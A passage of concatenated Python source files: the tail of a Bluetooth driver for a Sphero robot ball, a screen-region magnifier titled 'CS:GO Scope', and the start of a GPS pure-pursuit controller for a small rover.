callback for each type of data
"""
id_code = ord(self.bluetooth.receive(1))
length_msb = ord(self.bluetooth.receive(1))
length_lsb = ord(self.bluetooth.receive(1))
length = (length_msb << 8) + length_lsb
array = self._read(length, offset=3)
array[0] = id_code
array[1] = length_msb
array[2] = length_lsb
checksum = check_sum(array[0:-1])
if array[-1] != checksum:
eprint("Malfromed Packet, recieved: {0} expected: {1}".format(
array[-1], checksum))
return
else:
data = array[3:-1]
tocall = self._asyn_func.get(id_code, nothing)
thread = threading.Thread(target=tocall, args=(data,))
thread.start()
return
def _read(self, length, offset=0):
"""
reads a given length from the bluetooth, into a buffer, starting at a given offset
"""
array = bytearray(offset)
to_read = length
while to_read > 0:
out = self.bluetooth.receive(to_read)
array += out
to_read -= len(out)
return array
@property
def _seq(self):
"""
used for assigning unique seq numbers
"""
self._seq_num += 1
if self._seq_num > 0xff:
self._seq_num = 1
return self._seq_num
def _send(self, did, cid, data, response):
"""
sends data to sphero `did` is the device id, `cid` is the virtual core id
for more information view sphero Docs.
`data` is the data to send
`response` indicates if a response is expected or not if it is it handles
working with the event system, and blocks until response is recieved,
or `self.response_time_out` elapses
"""
event = None
seq_number = 0
data_length = len(data)
if response:
with self._response_lock:
seq_number = self._seq
event = threading.Event()
self._response_event_lookup[seq_number] = event
with self._msg_lock:
self._msg[1] = _ANSWER if response else _NO_ANSWER
self._msg[2] = did
self._msg[3] = cid
self._msg[4] = seq_number
self._msg[5] = data_length + 1
self._msg[6:6 + data_length] = data
checksum = check_sum(
self._msg[2: 6 + data_length])
self._msg[6 + data_length] = checksum
self.bluetooth.send(
buffer(self._msg[0: 6 + data_length + 1]))
if response:
if event.wait(self._response_time_out):
with self._response_lock:
return self._responses[seq_number]
return Response(True, '')
def connect(self, retries = 5):
"""
Establishes a connection and
returns a boolean indicating if the connection was successful.
Retries: how often it should be tried before raising an error
"""
while retries > 0:
res = None
try:
res = self.bluetooth.connect()
except:
res = None
if not res:
retries -= 1
else:
break
if not res:
raise ValueError("Could not connect to device.")
self._recieve_thread = threading.Thread(target=self._recieve_loop)
self.bluetooth.set_timeout(5)
return res
def disconnect(self):
"""
Closes the connection to the sphero.
If sphero is not connected the call has no effect.
"""
# self.bluetooth.set_timeout(5)
self.bluetooth.close()
def _stable_send(self, did, cid, data, response):
"""
A version of send that tries untill successful
if response is false it will only try once
"""
tries = 0
success = False
reply = None
while not success and tries < self.number_tries:
reply = self._send(did, cid, data, response)
tries += 1
success = reply.success
return reply
def is_alive(self):
return self._recieve_thread.is_alive() & self.bluetooth.is_connected()
# CORE COMMANDS
def ping(self):
"""
The Ping command is used to verify both a solid data link with the caller
and that Sphero is awake and dispatching commands.
A Response tuple is returned with response.success indicating if a response
is received back from the sphero, there is no accompanying data.
# Usage
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.ping()
print(response.success)
"""
reply = self._stable_send(_CORE, _CORE_COMMANDS['PING'], [], True)
return reply
def get_versioning(self):
"""
A Response tuple is returned, if `response.success == True`, then
`response.data` will contain a tuple of the bytes of the versioning info.
see Sphero api docs for more info.
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET VERSIONING'], [], True)
if reply.success:
parsed = struct.unpack_from(">8B", buffer(reply.data))
return Response(True, parsed)
else:
return reply
def set_device_name(self, name, response=False):
"""
This assigned name is held internally and produced as part of the Get Bluetooth Info
service below. Names are clipped at 48 characters in length to support UTF - 8 sequences
you can send something longer but the extra will be discarded.
This field defaults to the Bluetooth advertising name.
The returned Response objects data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
return self._stable_send(_CORE, _CORE_COMMANDS['SET NAME'], name, response)
def get_bluetooth_info(self):
"""
If successful the returned Response Object's data field
is a BluetoothInfo object containing the textual
name of the ball (defaults to the Bluetooth
advertising name but can be changed), the Bluetooth address and
the ID colors the ball blinks when not connected.
"""
result = self._stable_send(
_CORE, _CORE_COMMANDS['GET BLUETOOTH INFO'], [], True)
if result.success:
fmt = ">16s12sx3c"
temp_tup = struct.unpack_from(fmt, buffer(result.data))
name = temp_tup[0]
name = name[:name.find('\x00' if not py3 else b'\x00')] # python3 needs byte object
named_tuple = BluetoothInfo(
name, temp_tup[1], (temp_tup[2], temp_tup[3], temp_tup[4]))
return Response(True, named_tuple)
else:
return result
def get_power_state(self):
"""
If successful the response.data will contains a
PowerState tuple with the following fields in this order.
`recVer`: set to 1
`powerState`: 1 = Charging, 2 = OK, 3 = Low, 4 = Critical
`batt_voltage`: current battery voltage in 100ths of a volt
`num_charges`: number of recharges in the lilfe of this sphero
`time_since_chg`: seconds Awake
`
### Usage:
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.get_power_state()
if response.success:
power = response.data
print("power_state: {}".format(power.power_state))
print("Voltage: {}".format(power.batt_voltage))
print("Number Charges: {}".format(power.num_charges))
print("Time Since Charge: {}".format(power.time_since_chg))
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET POWER STATE'], [], True)
if reply.success:
parsed_answer = struct.unpack_from('>BBHHH', buffer(reply.data))
return Response(True, PowerState._make(parsed_answer))
else:
return reply
def set_power_notification(self, setting, response=False):
"""
Sets Async power notification messages to be sent. To access the notifications register a power_notfiation callback. Notifications
are sent every 10 seconds
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
flag = 0x01 if setting else 0x00
reply = self._stable_send(
_CORE, _CORE_COMMANDS['SET POWER NOTIFICATION'], [flag], response)
return reply
def sleep(self, wakeup_time, response=False):
"""
This command puts Sphero to sleep immediately.
The sphero will automaticall reawaken after `wakeup_time` seconds.
Zero does not program a wakeup interval, so it sleeps forever.
The Sphero must be reconnected after this function is called. However,
most settings are preserved.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
if wakeup_time < 0 or wakeup_time > 0xffff:
return Response(False, None)
big = wakeup_time >> 8
little = (wakeup_time & 0x00ff)
reply = self._stable_send(_CORE, _CORE_COMMANDS['SLEEP'], [
big, little, 0, 0, 0], response)
self.close()
return reply
def get_voltage_trip_points(self):
"""
If successful the Response Object's data field contains a tuple of the
voltage trip points for what Sphero considers Low and Critical battery.
The values are expressed in 100ths of a volt,
so the defaults of 7.00V and 6.50V respectively are returned as
700 and 650.
"""
reply = self._stable_send(
_CORE, _CORE_COMMANDS['GET VOLTAGE TRIP'], [], True)
if reply.success:
parse = struct.unpack_from(">HH", buffer(reply.data))
return Response(True, parse)
else:
return reply
def set_voltage_trip_points(self, low, critical, response=False):
"""
DOES NOT WORK
not implemented
This assigns the voltage trip points for Low and Critical battery voltages.
The values are specified in 100ths of a volt and
the limitations on adjusting these away from their defaults are:
Vlow must be in the range 675 to 725 ( += 25)
Vcrit must be in the range 625 to 675 ( += 25)
There must be 0.25V of separation between the two values
"""
assert False
low = int_to_bytes(low, 2)
crit = int_to_bytes(critical, 2)
return self._stable_send(_CORE, _CORE_COMMANDS['SET VOLTAGE TRIP'], low + crit, response)
def set_inactivity_timeout(self, timeout, response=False):
"""
Sets inactivity time out. Value must be greater than 60 seconds,
is preserved across power cycles.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
if timeout < 0 or timeout > 0xffff:
return False
big = timeout >> 8
little = (timeout & 0x00ff)
reply = self._send(_CORE, _CORE_COMMANDS['SET INACT TIMEOUT'], [
big, little], response)
return reply
def L1_diag(self):
"""
This is a developer - level command to help diagnose aberrant behavior.
Most system counters, process flags, and system states are decoded
into human readable ASCII.
If successful the Response Object's data field will contain an ASCII message.
"""
event = None
with self._response_lock:
event = threading.Event()
self._response_event_lookup['L1'] = event
self._stable_send(_CORE, _CORE_COMMANDS['L1'], [], False)
if event.wait(self._response_time_out * 10):
response = None
with self._response_lock:
response = self._responses['L1']
return Response(True, response)
else:
return Response(False, "no data recieved")
def L2_diag(self):
"""
DOES NOT WORK
This is a developers - only command to help diagnose aberrant behavior.
It is much less informative than the Level 1 command
but it is in binary format and easier to parse
Command not found
"""
assert False
return self._stable_send(_CORE, _CORE_COMMANDS['L2'], [], True)
def assign_time(self, time_value, response=False):
"""
Sets the internal timer to `time_value`.
This is the time that shows up in a collision message.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
return self._stable_send(_CORE, _CORE_COMMANDS['ASSIGN TIME'], int_to_bytes(time_value, 4), response)
def poll_packet_times(self):
"""
Command to help profile latencies
returns a PacketTime tuple with fields:
offset: the maximum - likelihood time offset of the Client clock to sphero's system clock
delay: round - trip delay between client a sphero
DOESN"T REALLY WORK YET....
"""
# TODO time 1 gets mangled.
time1 = int(round(time.time() * 1000))
bit1 = (time1 & 0xff000000) >> 24
bit2 = (time1 & 0x00ff0000) >> 16
bit3 = (time1 & 0x0000ff00) >> 8
bit4 = (time1 & 0x000000ff)
reply = self._stable_send(_CORE, _CORE_COMMANDS['POLL PACKET TIMES'], [
bit1, bit2, bit3, bit4], True)
time4 = int(round(time.time() * 1000)) & 0xffffffff
if reply.success:
sphero_time = struct.unpack_from('>III', buffer(reply.data))
offset = 0.5 * \
((sphero_time[1] - sphero_time[0]) + (sphero_time[2] - time4))
delay = (time4 - sphero_time[0]) - \
(sphero_time[2] - sphero_time[1])
return PacketTime(offset, delay)
# _SPHERO COMMANDS
def set_heading(self, heading, response=False):
"""
Sets the spheros heading in degrees,
heading must range between 0 to 359. This should move the
back tail light.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
if heading < 0 or heading > 359:
return Response(False, "heading must be between 0 and 359")
heading_bytes = int_to_bytes(heading, 2)
reply = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET HEADING'], heading_bytes, response)
return reply
def set_stabilization(self, stablize, response=False):
"""
This turns on or off the internal stabilization of Sphero,
the IMU is used to match the ball's orientation to its set points.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
flag = 0x01 if stablize else 0x00
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET STABILIZATION'], [flag], response)
def set_rotation_rate(self, rate, response=False):
"""
DOESN't WORK
This sets the roation rate sphero will use to meet new heading commands
Lower value offers better control, with a larger turning radius.
The rate should be in degrees / sec,
anythin above 199 the maxium value is used(400 degrees / sec)
"""
# TODO returns unknown command
if rate < 0:
return Response(False, "USE POSITIVE RATE ONLY")
if rate > 199:
rate = 200
else:
rate = int(rate / 0.784)
to_bytes = int_to_bytes(rate, 1)
return self._send(_SPHERO, _SPHERO_COMMANDS['SET ROTATION RATE'], to_bytes, response)
def get_chassis_id(self):
"""
Returns the Chassis ID as an int.
"""
response = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET CHASSIS ID'], [], True)
if response.success:
tup = struct.unpack_from('>H', buffer(response.data))
return Response(True, tup[0])
else:
return response
def set_data_stream(self, stream_settings, frequency, packet_count=0, response=False):
"""
Sets data stream options, where `stream_settings` is a DataStreamManager object,
and `frequency` how often you want to recieve data and `packet_count` indicates
the number of packets you want to recieve, set to zero for unlimited streaming.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
### Usage:
#!python
from spheropy.Sphero import Sphero
from spheropy.DataStream import DataStreamManager
dsm = DataStreamManager()
dsm.acc = True
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_data_stream(dsm, 10 packet_count=2)
"""
self._data_stream = stream_settings.copy()
divisor = int_to_bytes(int(400.0 / frequency), 2)
samples = int_to_bytes(self._data_stream.number_frames, 2)
mask1 = int_to_bytes(self._data_stream._mask1, 4)
mask2 = int_to_bytes(self._data_stream._mask2, 4)
data = divisor + samples + mask1 + [packet_count] + mask2
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET DATA STRM'], data, response)
def stop_data_stream(self):
"""
stops data streaming
"""
result = self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET DATA STRM'], [
0xff, 0, 0, 0, 0, 0, 0, 0, 1], True)
if result.success:
self._data_stream = None
return result
def start_collision_detection(self, x_threshold, x_speed, y_threshold, y_speed, dead=1000, response=False):
"""
Starts collision detection. `Threshold` values represent the max threshold,
and `speed` is added to the thresholds to rang detection by the spheros speed,
`dead` is the minimum time between detections
in ms. all data must be in the range 0...255
For more infomation see Collision Detection pdf
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
method = 0x01
dead = int(dead / 10)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET COLLISION DETECT'], [method, x_threshold, x_speed, y_threshold, y_speed, dead], response)
def stop_collision_detection(self, response=False):
"""
Stops collision detection
"""
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET COLLISION DETECT'], [0, 0, 0, 0, 0, 0], response)
def set_color(self, red, green, blue, default=False, response=False):
"""
Sets the color of the sphero given rgb components between 0 and 255,
if `default` is true, sphero will default to that color when first connected
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
### Usage:
#!python
from time import sleep
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_color(255, 0, 0)
sleep(1)
s.set_color(0, 255, 0)
sleep(1)
s.set_color(0, 0, 255)
"""
red = int_to_bytes(red, 1)
blue = int_to_bytes(blue, 1)
green = int_to_bytes(green, 1)
flag = [0x01] if default else [0x00]
return self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET COLOR'], red + green + blue + flag, response)
def set_back_light(self, brightness, response=False):
"""
Controls the brightness of the back LED, non persistent
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
brightness = int_to_bytes(brightness, 1)
return self._stable_send(
_SPHERO, _SPHERO_COMMANDS['SET BACKLIGHT'], brightness, response)
def get_color(self):
"""
If sucessful `response.data` contains the sphero default
Color, may not be the current color shown.
### Usage:
#!python
from spheropy.Sphero import Sphero
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
response = s.get_color()
if response.success:
color = response.data
print("r: {} b: {} g: {}".format(color.r, color.b, color.g))
"""
response = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET COLOR'], [], True)
if response.success:
parse = struct.unpack_from('>BBB', buffer(response.data))
return Response(True, Color._make(parse))
else:
return response
def roll(self, speed, heading, fast_rotate=False, response=False):
"""
Commands the sphero to move. `speed` ranges from 0..255, while `heading` is
in degrees from 0..359, 0 is strait, 90 is to the right, 180 is back and
270 is to the left. When `fast_rotate` is set to True sphero will rotate as
quickly as possible to given heading regardless of speed.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
gobit = [0x02] if fast_rotate else [0x01]
speed = int_to_bytes(speed, 1)
heading = int_to_bytes(heading, 2)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['ROLL'], speed + heading + gobit, response)
def stop(self, response=False):
"""
Commands the Shero to stop.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['ROLL'], [0, 0, 0, 0], response)
def boost(self, activate, response=True):
"""
Activates or deactivates boost, depending on the truth value of `activate`.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
activate = 0x01 if activate else 0x00
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['BOOST'], [activate], response)
def set_raw_motor_values(self, left_value, right_value, response=False):
"""
Allows direct controle of the motors
both motor values should be MotorValue tuple
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
lmode = left_value.mode.value
lpower = left_value.power
rmode = right_value.mode.value
rpower = right_value.power
if outside_range(lpower, 0, 255) or outside_range(rpower, 0, 255):
raise SpheroException("Values outside of range")
data = [lmode, lpower, rmode, rpower]
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET RAW MOTOR'], data, response)
def set_motion_timeout(self, timeout, response=False):
"""
This sets the ultimate timeout for the last motion command
to keep Sphero from rolling away
timeout is in miliseconds and defaults to 2000
for this to be in effect motion timeout must be
in must be set in permanent options
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
if self._outside_range(timeout, 0, 0xFFFF):
raise SpheroException("Timeout outside of valid range")
timeout = int_to_bytes(timeout, 2)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['MOTION TIMEOUT'], timeout, response)
def set_permanent_options(self, options, response=False):
"""
Set Options, for option information see PermanentOptionFlag docs.
Options persist across power cycles. `options` is a Permanent Option Object
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
### Usage:
#!python
from spheropy.Sphero import Sphero
from spheropy.Options import PermanentOptions
po = PermanentOptions()
po.set_light_wakeup_sensitivity= True
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.set_permanent_options(po)
"""
options = int_to_bytes(options.bitflags, 8)
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET PERM OPTIONS'], options, response)
def get_permanent_options(self):
"""
If successful `result.data` contains the Permenent Options of the sphero
"""
result = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET PERM OPTIONS'], [], True)
if result.success:
settings = struct.unpack_from('>Q', buffer(result.data))
options = PermanentOptions()
options.bitflags = settings[0]
return Response(True, options)
else:
return result
def set_stop_on_disconnect(self, value=True, response=False):
"""
Sets sphero to stop on disconnect, this is a one_shot, so it must be reset on reconnect.
Set `value` to false to turn off behavior.
The returned Response object's data field will be empty,
but if `response` is set to `True`, it's success field
will indicate if the command was successful.
"""
value = 1 if value else 0
return self._stable_send(_SPHERO, _SPHERO_COMMANDS['SET TEMP OPTIONS'], [
0, 0, 0, value], response)
def will_stop_on_disconnect(self):
"""
Returns if the sphero will stop when it is disconnected.
"""
result = self._stable_send(
_SPHERO, _SPHERO_COMMANDS['GET TEMP OPTOINS'], [], True)
if result.success:
return Response(True, bool(result.data))
else:
return result
# ASYNC
def register_sensor_callback(self, func):
"""
Register a function to call when a sensor message is recieved.
`func` must be callable and it will be started in its own thread
as not to block the recieve loop.
### Usage:
#!python
from time import sleep
from spheropy.Sphero import Sphero
dsm = DataStreamManager()
dsm.acc = True
dsm.odom = True
#assume acc and odom sensor messages have be requested
def callback(sensor_data):
#sensor_data will be an array of dictionaries where
#each item is a frame sent by the sphero
for frames in sensor_data:
print(frames['acc'])
print(frames['odom'])
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_sensor_callback(callback)
s.set_data_stream(dsm, 10 packet_count=2)
# callback will be called twice
sleep(1) # so data will be recieved before exit
"""
assert callable(func)
self._sensor_callback = func
def register_power_callback(self, func):
"""
Register a function to call when an async power notification is recieved. `func` must be callable and it will be started in it's own thread. The call back will recieve an integer with:
1 = charging
2 = OK
3 = Low
4 = Critical
### Usage:
#!python
import time
from sphropy.Sphero import Sphero
def callback(notification):
print(notification)
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_power_callback(callback)
s.set_power_notification(True)
time.sleep(20)
"""
assert callable(func)
self._power_callback = func
def register_collision_callback(self, func):
"""
Registers a callback function for asyn collision notifications.
`func` must be callable and it is started in it's own thread
### Usage:
#!python
import time
from spheropy.Sphero import Sphero
def callback(data):
#data will be a CollisionMsg
print(data.x)
print(data.y)
print(data.axis)
print(data.speed)
print(data.timestamp)
with Sphero("Sphero-YWY", "68:86:E7:07:59:71") as s:
s.register_collision_callback(callback)
s.start_collision_detection(100, 50, 100, 50)
time.sleep(10)
s.stop_collision_detection()
"""
assert callable(func)
self._collision_callback = func
def _power_notification(self, notification):
"""
Parses a power notification and calls the callback
"""
parsed = struct.unpack_from('B', buffer(notification))
self._power_callback(parsed[0])
def _forward_L1_diag(self, data):
"""
This is used to forwrard the L1 diagnostic call. It
is treated differently becuase it is sent as an async message
even though it is in response to a system call
"""
event = None
with self._response_lock:
self._responses['L1'] = str(data)
if 'L1' in self._response_event_lookup:
event = self._response_event_lookup['L1']
del self._response_event_lookup['L1']
event.set()
def _sensor_data(self, data):
"""
parses sensor data and forwards it to registered callback
"""
if self._data_stream is None:
self.stop_data_stream()
return
parsed = self._data_stream.parse(data)
self._sensor_callback(parsed)
def _collision_detect(self, data):
"""
Parses collision events and calls teh callback
"""
fmt = ">3hB2HbI"
unpacked = struct.unpack_from(fmt, buffer(data))
x_list = ['x'] if unpacked[3] & 0x01 else []
y_list = ['y'] if unpacked[3] & 0x02 else []
parsed = CollisionMsg(unpacked[0], unpacked[1], unpacked[2], x_list +
y_list, unpacked[4], unpacked[5], unpacked[6], unpacked[7])
self._collision_callback(parsed)
def start(self):
self._recieve_thread.start()
|
scope.py
|
try:
from multiprocessing import Process, Queue, Pipe
import numpy as np
import signal
import cv2
import time
import os
from mss import mss
except ImportError as e:
print("[+] Some required modules were not found.")
print("[+] Installing required modules with pip")
os.system("pip install -r requirements.txt")
print("[+] Required modules were installed.\n")
print("[+] Restarting the program")
os.system("python3 scope.py")
def get_screen_size():
with mss() as sct:
monitor = sct.monitors[1]
return monitor['width'], monitor['height']
def grab_screen_region(region, frame_queue):
sct = mss()
while True:
sct_img = sct.grab(region)
img = np.array(sct_img)
if(frame_queue.qsize() < 60):
frame_queue.put(img)
def display_img(frame_queue, Connection_1, Connection_2):
fps = 0
prev_frame_time = 0
new_frame_time = 0
Pid1 = Connection_1.recv()
Pid2 = Connection_2.recv()
print("[+] Frame Grab Process ID:".ljust(37), Pid1)
print("[+] Frame Queue Counter Process ID:".ljust(37), Pid2)
# fourcc = cv2.VideoWriter_fourcc(*'XVID')
# out = cv2.VideoWriter('output.avi', fourcc, 60.0, (zoomed_width, zoomed_width))
while True:
new_frame_time = time.time()
sct_img = frame_queue.get()
sct_img = cv2.resize(sct_img, (zoomed_width, zoomed_width))
cv2.circle(sct_img, (scope_width, scope_width),
int(scope_width/15), color, thickness)
sct_img = cv2.putText(sct_img, "FPS: "+str(fps), origin, font,
fontScale, color, thickness, cv2.LINE_AA)
cv2.imshow('CS:GO Scope', sct_img)
# im = np.flip(sct_img[:, :, :3], 2) # 1
# im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# out.write(im)
if (cv2.waitKey(1) & 0xFF) == ord('q'):
cv2.destroyAllWindows()
# out.release()
os.kill(Pid1, 9)
os.kill(Pid2, 9)
return
fps = int(1/(new_frame_time-prev_frame_time))
prev_frame_time = new_frame_time
def frame_queue_size(frame_queue):
while True:
frames_in_queue = frame_queue.qsize()
print("[+] Frames in Queue:".ljust(37), frames_in_queue, end="\r")
time.sleep(1)
screen_width, screen_height = get_screen_size()
scope_width = 300
zoom_factor = 2
zoomed_width = scope_width * zoom_factor
horizontal_mid = int((screen_width-scope_width)/2)
vertical_mid = int((screen_height-scope_width)/2)
bounding_box = {'top': vertical_mid,
'left': horizontal_mid, 'width': scope_width, 'height': scope_width}
color = (0, 255, 0)
thickness = 1
origin = (5, 26)
fontScale = 0.6
font = cv2.FONT_HERSHEY_SIMPLEX
frame_queue = Queue()
if __name__ == '__main__':
Connection_1, Connection_2 = Pipe()
print("[+] Starting Program".ljust(37))
print("[+] Press 'q' to quit".ljust(37))
print("[+] Screen Resolution:".ljust(37), screen_width, "x", screen_width)
grab_process = Process(target=grab_screen_region, args=(
bounding_box, frame_queue,))
frame_queue_process = Process(target=frame_queue_size, args=(frame_queue,))
grab_process.start()
frame_queue_process.start()
Connection_1.send(grab_process.pid)
Connection_2.send(frame_queue_process.pid)
display_process = Process(target=display_img, args=(
frame_queue, Connection_1, Connection_2,))
display_process.start()
grab_process.join()
display_process.join()
frame_queue_process.join()
print("[+] Program Terminated".ljust(37))
|
termuxTrover.py
|
#!/usr/bin/env python3
import threading
import netifaces as ni
import numpy as np
import math
import time
import socket
import signal
import logging
import pynmea2
import io
import sys
# For network tests
import requests
import urllib.parse
localPP = 1
rpiIP = "192.168.142.203"
fname = "rtkwaypoints.txt"#"5gwaypoints.txt" # "halftrackwaypoints.txt"#"newccsvwaypoints.txt"#"rtkwaypoints.txt"
L = 3 # meters
logging.basicConfig(filename='app.log', filemode='w', format='%(message)s', level=logging.INFO)
rpiPort = 40000
def TicTocGenerator():
# Generator that returns time differences
ti = 0 # initial time
tf = time.time() # final time
while True:
ti = tf
tf = time.time()
yield tf - ti # returns the time difference
TicToc = TicTocGenerator() # create an instance of the TicTocGen generator
# This will be the main function through which we define both tic() and toc()
def toc(tempBool=True):
# Prints the time difference yielded by generator instance TicToc
tempTimeInterval = next(TicToc)
if tempBool:
print("Elapsed time: %f seconds.\n" % tempTimeInterval)
def tic():
# Records a time in TicToc, marks the beginning of a time interval
toc(False)
dstStream = "192.168.207.50" # "24.99.125.134" #should be ip of laptop running on matlab
dstreamport = 40000 # should be port of udp server running on matlab
###############################
# Pure Pursuit Config#
###############################
# Mapping and localization
waypoints = []
waypoints_utm = []
# Pure Pursuit Variables
goalRadius = 3; # meters
spacingBetweenCoarseWaypoints = 0.05 # 6 inches
pp_MaxTurnAngle = np.radians(14.5) # degrees to avoid too large a PWM value
MaxAngularVelocity = math.pi / 8; # radians per second; (not implemented yet need to implement and optimize to reduce fast angular changes)
sensorDict = {}
sensorDict["compass"] = 90
currentCompass = 90
######################
# Getting GPS and Sensor from Phone
######################
#ni.ifaddresses('wlan0')
#localIP = ni.ifaddresses('wlan0')[ni.AF_INET][0]['addr']
# Create a UDP client socket for local GPS from USB/TCP bridge
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(('192.0.0.2',1236))
ss=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#gga=False
#rmc=False
#o=''
def udpListener_gps_heading(sensorDict):
global currentCompass
while True:
data = s.recv(115200)
sdata = data.decode('ascii')
buf = io.StringIO(sdata)
nmea_sentence = '-------'
while len(nmea_sentence) > 0:
nmea_sentence = buf.readline()
if 'GGA' in nmea_sentence:
msg_latlon = pynmea2.parse(nmea_sentence)
sensorDict["gps"] = [float(msg_latlon.latitude), float(msg_latlon.longitude)]
#o += "%s,%s" % (msg_latlon.latitude, msg_latlon.longitude)
#gga = True
if 'RMC' in nmea_sentence:
msg = pynmea2.parse(nmea_sentence)
try:
angle = float(msg.true_course)
angle = 360+(90-angle)
if angle > 360:
angle = angle - 360
except:
angle = -9999
if angle!=-9999:
sensorDict["compass"] = float(angle)
currentCompass = float(angle)
else:
sensorDict["compass"] = currentCompass
#sensorDict["compass"] = 'None'
#o += "%s," % (str(angle))
#rmc = True
#if gga and rmc:
#print(o)
#gga = False
#rmc = False
#o = ''
time.sleep(.01)
#def udpListener_gps(sensorDict):
# Listen for incoming datagrams from USB/TCP bridge app
# while True:
# bytesAddressPair = UDPServerSocket_gps.recvfrom(bufferSize)
# message = bytesAddressPair[0]
# sdata = message.decode('utf-8').split(',')
# sensorDict["gps"] = [float(sdata[1]), float(sdata[2])]
# if sdata[0] == 'None':
# g = 1 # sensorDict["compass"] = sensorDict["compass"]
# else:
# sensorDict["compass"] = float(sdata[0])
# time.sleep(.05)
'''
def udpListener_mag2(sensorDict):
c = 0
a = 0
while True:
bytesAddressPair = UDPServerSocket_mag.recvfrom(bufferSize)
message = bytesAddressPair[0]
sdata = message.decode('utf-8').split(',')
angle = math.atan2(float(sdata[1]), float(sdata[2]))
angle = math.degrees(angle) + 270
if angle > 360:
angle = angle - 360
sensorDict["compass"] = angle
a += angle
if c == 11:
# sensorDict["compass"] = a/10
c = 0
a = 0;
c += 1
time.sleep(.05)
'''
######################
# Pure Pursuit Controller
######################
def mysign(x):
if x < 0:
return -1
if x == 0:
return 0
if x > 0:
return 1
def myrem(x, y):
w = 0
if x / y < 0:
w = math.floor(x / y) + 1
else:
w = math.floor(x / y)
return x - y * w
def networkPurePursuit(rx, ry, rtheta, goalx, goaly, d, pp_MaxTurnAngle):
getVars = {'rx': rx, 'ry': ry, 'rtheta': rtheta, 'goalx': goalx[0], 'goaly': goaly[0], 'd': d, 'maxturnangle': pp_MaxTurnAngle}
url = 'http://24.99.125.134:19990/trover/pp?'
# Python 3:
o = "{}{}".format(url, urllib.parse.urlencode(getVars))
#o=o.strip("%5B")
#o=o.strip("%5D")
#print(o)
try:
r = requests.get(o)
return float(r.text)
except:
return -1
def purePursuit(pose, lx, ly, d):
speedval = 1
# local variables
theta = pose[2] # car heading relative to world x-axis (i.e., Magnetic East)
beta = math.atan2((ly - pose[1]), (lx - pose[0])) # direction in radians to goal point
if abs(theta - beta) < .000001:
gamma = 0
else:
gamma = theta - beta # direction in radians to goal point in car's local coordinate where positive is right
x_offset = d * math.sin(gamma) * -1
y_offset = d * math.cos(gamma)
turnangle = (2 * x_offset) / (d ** 2)
thesign = mysign((math.sin(pose[2]) * (lx - pose[0])) - (math.cos(pose[2]) * (ly - pose[1])))
turnangle = thesign * turnangle
# Ensure the turn control saturates at MaxTurnAngle defined by servo
if abs(turnangle) > pp_MaxTurnAngle:
turnangle = thesign * pp_MaxTurnAngle
turnangle = myrem(turnangle, 2 * math.pi)
return turnangle, speedval
# deg2utm - converts GPS lat, lon (spherical coordinates) to utm (cartesian coordinates)
# The output is the x and y position of the T-Rover for a specific utmzone
def deg2utm(Lat, Lon):
# Memory pre-allocation
x = []
y = []
utmzone = []
# Main Loop
#
la = Lat
lo = Lon
sa = 6378137.000000
sb = 6356752.314245
# e = ( ( ( sa ** 2 ) - ( sb ** 2 ) ) ** 0.5 ) / sa;
e2 = (((sa ** 2) - (sb ** 2)) ** 0.5) / sb
e2cuadrada = e2 ** 2
c = (sa ** 2) / sb
# alpha = ( sa - sb ) / sa; #f
# ablandamiento = 1 / alpha; # 1/f
